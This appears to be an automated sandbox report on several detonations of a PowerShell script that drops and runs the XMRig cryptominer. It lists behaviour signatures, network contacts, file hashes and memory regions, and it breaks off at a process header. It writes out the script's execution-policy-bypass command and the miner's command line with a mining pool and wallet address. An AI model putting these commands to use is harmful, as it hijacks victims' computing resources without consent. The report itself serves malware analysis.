| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1504 wrote to memory of 1932 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 1504 wrote to memory of 1932 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4456,i,2607710392823067546,4648797561512801463,262144 --variations-seed-version --mojo-platform-channel-handle=1300 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3804,i,2607710392823067546,4648797561512801463,262144 --variations-seed-version --mojo-platform-channel-handle=4276 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 45.19.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.71.105.51.in-addr.arpa | udp |
Files
memory/1504-0-0x00007FFF00A53000-0x00007FFF00A55000-memory.dmp
memory/1504-1-0x0000021CFE750000-0x0000021CFE772000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ezmqpdsz.sh3.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1504-11-0x00007FFF00A50000-0x00007FFF01511000-memory.dmp
memory/1504-12-0x00007FFF00A50000-0x00007FFF01511000-memory.dmp
memory/1504-14-0x00007FFF00A50000-0x00007FFF01511000-memory.dmp
memory/1504-15-0x0000021CFEC20000-0x0000021CFEC32000-memory.dmp
memory/1504-16-0x0000021CE40D0000-0x0000021CE40DA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/1932-47-0x000002CAE2420000-0x000002CAE2440000-memory.dmp
memory/1932-48-0x000002CAE3D50000-0x000002CAE3D70000-memory.dmp
memory/1932-49-0x00007FF6CC390000-0x00007FF6CCFC3000-memory.dmp
memory/1504-50-0x00007FFF00A50000-0x00007FFF01511000-memory.dmp
memory/1932-53-0x000002CAE3D70000-0x000002CAE3D90000-memory.dmp
memory/1504-52-0x00007FFF00A53000-0x00007FFF00A55000-memory.dmp
memory/1932-51-0x00007FF6CC390000-0x00007FF6CCFC3000-memory.dmp
memory/1932-55-0x000002CAE3D90000-0x000002CAE3DB0000-memory.dmp
memory/1504-54-0x00007FFF00A50000-0x00007FFF01511000-memory.dmp
memory/1932-56-0x00007FF6CC390000-0x00007FF6CCFC3000-memory.dmp
memory/1932-58-0x000002CAE3D70000-0x000002CAE3D90000-memory.dmp
memory/1932-57-0x00007FF6CC390000-0x00007FF6CCFC3000-memory.dmp
memory/1932-59-0x000002CAE3D90000-0x000002CAE3DB0000-memory.dmp
memory/1932-60-0x00007FF6CC390000-0x00007FF6CCFC3000-memory.dmp
memory/1932-61-0x00007FF6CC390000-0x00007FF6CCFC3000-memory.dmp
memory/1932-62-0x00007FF6CC390000-0x00007FF6CCFC3000-memory.dmp
memory/1932-63-0x00007FF6CC390000-0x00007FF6CCFC3000-memory.dmp
memory/1932-64-0x00007FF6CC390000-0x00007FF6CCFC3000-memory.dmp
memory/1932-65-0x00007FF6CC390000-0x00007FF6CCFC3000-memory.dmp
memory/1932-66-0x00007FF6CC390000-0x00007FF6CCFC3000-memory.dmp
memory/1932-67-0x00007FF6CC390000-0x00007FF6CCFC3000-memory.dmp
memory/1932-68-0x00007FF6CC390000-0x00007FF6CCFC3000-memory.dmp
memory/1932-69-0x00007FF6CC390000-0x00007FF6CCFC3000-memory.dmp
memory/1932-70-0x00007FF6CC390000-0x00007FF6CCFC3000-memory.dmp
memory/1932-71-0x00007FF6CC390000-0x00007FF6CCFC3000-memory.dmp
memory/1932-72-0x00007FF6CC390000-0x00007FF6CCFC3000-memory.dmp
memory/1932-73-0x00007FF6CC390000-0x00007FF6CCFC3000-memory.dmp
memory/1932-74-0x00007FF6CC390000-0x00007FF6CCFC3000-memory.dmp
memory/1932-75-0x00007FF6CC390000-0x00007FF6CCFC3000-memory.dmp
memory/1932-76-0x00007FF6CC390000-0x00007FF6CCFC3000-memory.dmp
memory/1932-77-0x00007FF6CC390000-0x00007FF6CCFC3000-memory.dmp
memory/1932-78-0x00007FF6CC390000-0x00007FF6CCFC3000-memory.dmp
memory/1932-79-0x00007FF6CC390000-0x00007FF6CCFC3000-memory.dmp
memory/1932-80-0x00007FF6CC390000-0x00007FF6CCFC3000-memory.dmp
memory/1932-81-0x00007FF6CC390000-0x00007FF6CCFC3000-memory.dmp
memory/1932-82-0x00007FF6CC390000-0x00007FF6CCFC3000-memory.dmp
memory/1932-83-0x00007FF6CC390000-0x00007FF6CCFC3000-memory.dmp
memory/1932-84-0x00007FF6CC390000-0x00007FF6CCFC3000-memory.dmp
memory/1932-85-0x00007FF6CC390000-0x00007FF6CCFC3000-memory.dmp
memory/1932-86-0x00007FF6CC390000-0x00007FF6CCFC3000-memory.dmp
memory/1932-87-0x00007FF6CC390000-0x00007FF6CCFC3000-memory.dmp
memory/1932-88-0x00007FF6CC390000-0x00007FF6CCFC3000-memory.dmp
memory/1932-89-0x00007FF6CC390000-0x00007FF6CCFC3000-memory.dmp
memory/1932-90-0x00007FF6CC390000-0x00007FF6CCFC3000-memory.dmp
memory/1932-91-0x00007FF6CC390000-0x00007FF6CCFC3000-memory.dmp
memory/1932-92-0x00007FF6CC390000-0x00007FF6CCFC3000-memory.dmp
memory/1932-93-0x00007FF6CC390000-0x00007FF6CCFC3000-memory.dmp
memory/1932-94-0x00007FF6CC390000-0x00007FF6CCFC3000-memory.dmp
memory/1932-95-0x00007FF6CC390000-0x00007FF6CCFC3000-memory.dmp
memory/1932-96-0x00007FF6CC390000-0x00007FF6CCFC3000-memory.dmp
memory/1932-97-0x00007FF6CC390000-0x00007FF6CCFC3000-memory.dmp
memory/1932-98-0x00007FF6CC390000-0x00007FF6CCFC3000-memory.dmp
memory/1932-99-0x00007FF6CC390000-0x00007FF6CCFC3000-memory.dmp
memory/1932-100-0x00007FF6CC390000-0x00007FF6CCFC3000-memory.dmp
memory/1932-101-0x00007FF6CC390000-0x00007FF6CCFC3000-memory.dmp
memory/1932-102-0x00007FF6CC390000-0x00007FF6CCFC3000-memory.dmp
memory/1932-103-0x00007FF6CC390000-0x00007FF6CCFC3000-memory.dmp
memory/1932-104-0x00007FF6CC390000-0x00007FF6CCFC3000-memory.dmp
memory/1932-105-0x00007FF6CC390000-0x00007FF6CCFC3000-memory.dmp
memory/1932-106-0x00007FF6CC390000-0x00007FF6CCFC3000-memory.dmp
memory/1932-107-0x00007FF6CC390000-0x00007FF6CCFC3000-memory.dmp
memory/1932-108-0x00007FF6CC390000-0x00007FF6CCFC3000-memory.dmp
memory/1932-109-0x00007FF6CC390000-0x00007FF6CCFC3000-memory.dmp
memory/1932-110-0x00007FF6CC390000-0x00007FF6CCFC3000-memory.dmp
memory/1932-111-0x00007FF6CC390000-0x00007FF6CCFC3000-memory.dmp
memory/1932-112-0x00007FF6CC390000-0x00007FF6CCFC3000-memory.dmp
memory/1932-113-0x00007FF6CC390000-0x00007FF6CCFC3000-memory.dmp
memory/1932-114-0x00007FF6CC390000-0x00007FF6CCFC3000-memory.dmp
memory/1932-115-0x00007FF6CC390000-0x00007FF6CCFC3000-memory.dmp
memory/1932-116-0x00007FF6CC390000-0x00007FF6CCFC3000-memory.dmp
memory/1932-117-0x00007FF6CC390000-0x00007FF6CCFC3000-memory.dmp
memory/1932-118-0x00007FF6CC390000-0x00007FF6CCFC3000-memory.dmp
Analysis: behavioral17
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 01:28
Platform
win10-20240404-en
Max time kernel
1797s
Max time network
1778s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2584 wrote to memory of 2200 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2584 wrote to memory of 2200 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
Files
memory/2584-4-0x00007FFD204C3000-0x00007FFD204C4000-memory.dmp
memory/2584-5-0x000002C4549D0000-0x000002C4549F2000-memory.dmp
memory/2584-6-0x00007FFD204C0000-0x00007FFD20EAC000-memory.dmp
memory/2584-9-0x00007FFD204C0000-0x00007FFD20EAC000-memory.dmp
memory/2584-10-0x000002C46D040000-0x000002C46D0B6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wwti52cp.dip.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/2584-26-0x00007FFD204C0000-0x00007FFD20EAC000-memory.dmp
memory/2584-49-0x000002C46CED0000-0x000002C46CEE2000-memory.dmp
memory/2584-62-0x000002C46CEC0000-0x000002C46CECA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2200-91-0x000002E27DA50000-0x000002E27DA70000-memory.dmp
memory/2200-92-0x00007FF69E500000-0x00007FF69F133000-memory.dmp
memory/2200-93-0x00007FF69E500000-0x00007FF69F133000-memory.dmp
memory/2584-94-0x00007FFD204C3000-0x00007FFD204C4000-memory.dmp
memory/2584-95-0x00007FFD204C0000-0x00007FFD20EAC000-memory.dmp
memory/2584-96-0x00007FFD204C0000-0x00007FFD20EAC000-memory.dmp
memory/2200-97-0x00007FF69E500000-0x00007FF69F133000-memory.dmp
memory/2200-98-0x00007FF69E500000-0x00007FF69F133000-memory.dmp
memory/2200-99-0x00007FF69E500000-0x00007FF69F133000-memory.dmp
memory/2200-100-0x00007FF69E500000-0x00007FF69F133000-memory.dmp
memory/2200-101-0x00007FF69E500000-0x00007FF69F133000-memory.dmp
memory/2200-102-0x00007FF69E500000-0x00007FF69F133000-memory.dmp
memory/2200-103-0x00007FF69E500000-0x00007FF69F133000-memory.dmp
memory/2200-104-0x00007FF69E500000-0x00007FF69F133000-memory.dmp
memory/2200-105-0x00007FF69E500000-0x00007FF69F133000-memory.dmp
memory/2200-106-0x00007FF69E500000-0x00007FF69F133000-memory.dmp
memory/2200-107-0x00007FF69E500000-0x00007FF69F133000-memory.dmp
memory/2200-108-0x00007FF69E500000-0x00007FF69F133000-memory.dmp
memory/2200-109-0x00007FF69E500000-0x00007FF69F133000-memory.dmp
memory/2200-110-0x00007FF69E500000-0x00007FF69F133000-memory.dmp
memory/2200-111-0x00007FF69E500000-0x00007FF69F133000-memory.dmp
memory/2200-112-0x00007FF69E500000-0x00007FF69F133000-memory.dmp
memory/2200-113-0x00007FF69E500000-0x00007FF69F133000-memory.dmp
memory/2200-114-0x00007FF69E500000-0x00007FF69F133000-memory.dmp
memory/2200-115-0x00007FF69E500000-0x00007FF69F133000-memory.dmp
memory/2200-116-0x00007FF69E500000-0x00007FF69F133000-memory.dmp
memory/2200-117-0x00007FF69E500000-0x00007FF69F133000-memory.dmp
memory/2200-118-0x00007FF69E500000-0x00007FF69F133000-memory.dmp
memory/2200-119-0x00007FF69E500000-0x00007FF69F133000-memory.dmp
memory/2200-120-0x00007FF69E500000-0x00007FF69F133000-memory.dmp
memory/2200-121-0x00007FF69E500000-0x00007FF69F133000-memory.dmp
memory/2200-122-0x00007FF69E500000-0x00007FF69F133000-memory.dmp
memory/2200-123-0x00007FF69E500000-0x00007FF69F133000-memory.dmp
memory/2200-124-0x00007FF69E500000-0x00007FF69F133000-memory.dmp
memory/2200-125-0x00007FF69E500000-0x00007FF69F133000-memory.dmp
memory/2200-126-0x00007FF69E500000-0x00007FF69F133000-memory.dmp
memory/2200-127-0x00007FF69E500000-0x00007FF69F133000-memory.dmp
memory/2200-128-0x00007FF69E500000-0x00007FF69F133000-memory.dmp
memory/2200-129-0x00007FF69E500000-0x00007FF69F133000-memory.dmp
memory/2200-130-0x00007FF69E500000-0x00007FF69F133000-memory.dmp
memory/2200-131-0x00007FF69E500000-0x00007FF69F133000-memory.dmp
memory/2200-132-0x00007FF69E500000-0x00007FF69F133000-memory.dmp
memory/2200-133-0x00007FF69E500000-0x00007FF69F133000-memory.dmp
memory/2200-134-0x00007FF69E500000-0x00007FF69F133000-memory.dmp
memory/2200-135-0x00007FF69E500000-0x00007FF69F133000-memory.dmp
memory/2200-136-0x00007FF69E500000-0x00007FF69F133000-memory.dmp
memory/2200-137-0x00007FF69E500000-0x00007FF69F133000-memory.dmp
memory/2200-138-0x00007FF69E500000-0x00007FF69F133000-memory.dmp
memory/2200-139-0x00007FF69E500000-0x00007FF69F133000-memory.dmp
memory/2200-140-0x00007FF69E500000-0x00007FF69F133000-memory.dmp
memory/2200-141-0x00007FF69E500000-0x00007FF69F133000-memory.dmp
memory/2200-142-0x00007FF69E500000-0x00007FF69F133000-memory.dmp
memory/2200-143-0x00007FF69E500000-0x00007FF69F133000-memory.dmp
memory/2200-144-0x00007FF69E500000-0x00007FF69F133000-memory.dmp
memory/2200-145-0x00007FF69E500000-0x00007FF69F133000-memory.dmp
memory/2200-146-0x00007FF69E500000-0x00007FF69F133000-memory.dmp
memory/2200-147-0x00007FF69E500000-0x00007FF69F133000-memory.dmp
memory/2200-148-0x00007FF69E500000-0x00007FF69F133000-memory.dmp
memory/2200-149-0x00007FF69E500000-0x00007FF69F133000-memory.dmp
memory/2200-150-0x00007FF69E500000-0x00007FF69F133000-memory.dmp
memory/2200-151-0x00007FF69E500000-0x00007FF69F133000-memory.dmp
memory/2200-152-0x00007FF69E500000-0x00007FF69F133000-memory.dmp
memory/2200-153-0x00007FF69E500000-0x00007FF69F133000-memory.dmp
memory/2200-154-0x00007FF69E500000-0x00007FF69F133000-memory.dmp
memory/2200-155-0x00007FF69E500000-0x00007FF69F133000-memory.dmp
memory/2200-156-0x00007FF69E500000-0x00007FF69F133000-memory.dmp
memory/2200-157-0x00007FF69E500000-0x00007FF69F133000-memory.dmp
Analysis: behavioral21
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 01:41
Platform
win10v2004-20240508-en
Max time kernel
1792s
Max time network
1780s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3364 wrote to memory of 1952 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3364 wrote to memory of 1952 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
